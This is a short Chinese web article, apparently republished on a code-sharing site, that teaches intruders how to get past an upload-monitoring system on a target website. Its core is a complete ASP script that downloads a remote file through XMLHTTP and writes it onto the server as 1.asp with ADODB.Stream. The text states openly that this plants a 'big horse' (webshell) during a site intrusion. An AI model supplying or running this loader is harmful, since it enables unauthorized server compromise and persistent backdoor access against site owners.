当前位置: 代码网 > 服务器>网络安全>企业安全 > 突破一流拦截 上传限制的方法

突破一流拦截 上传限制的方法

2009年07月19日 企业安全 我要评论
突破一流拦截 上传限制的方法在我们入侵网站的过程中,有时候提交我们的大马或者其他ASP文件的时候,会被一流信息监控系统所拦截... 09-07-19
这是因为它设置了限制提交字符,既然它不允许我们进行提交,那我们可以采用下载的方法.这个就好比我们上传大exe文件的时候,网站禁止了上传,但是我们可以采用外部下载的方式来把目标文件下载到本地服务器中.好了,这个方法就是,只要服务器没有禁用xml和数据流组件,我们可以往服务器中提交以下asp脚本文件

复制代码
代码如下:

<%
set xpost = createobject("microsoft.xmlhttp")
xpost.open "get","https://www.jb51.net/1.txt",false
xpost.send()
set sget = createobject("adodb.stream")
sget.mode = 3
sget.type = 1
sget.open()
sget.write(xpost.responsebody)
sget.savetofile server.mappath("1.asp"),2
set sget = nothing
set spost = nothing
%>
(0)

相关文章:

版权声明:本文内容由互联网用户贡献,该文观点仅代表作者本人。本站仅提供信息存储服务,不拥有所有权,不承担相关法律责任。 如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 2386932994@qq.com 举报,一经查实将立刻删除。

发表评论

验证码:
最近更新的文章
推荐阅读
大家感兴趣的文章
Copyright © 2017-2025  代码网 保留所有权利. 粤ICP备2024248653号
站长QQ:2386932994 | 联系邮箱:2386932994@qq.com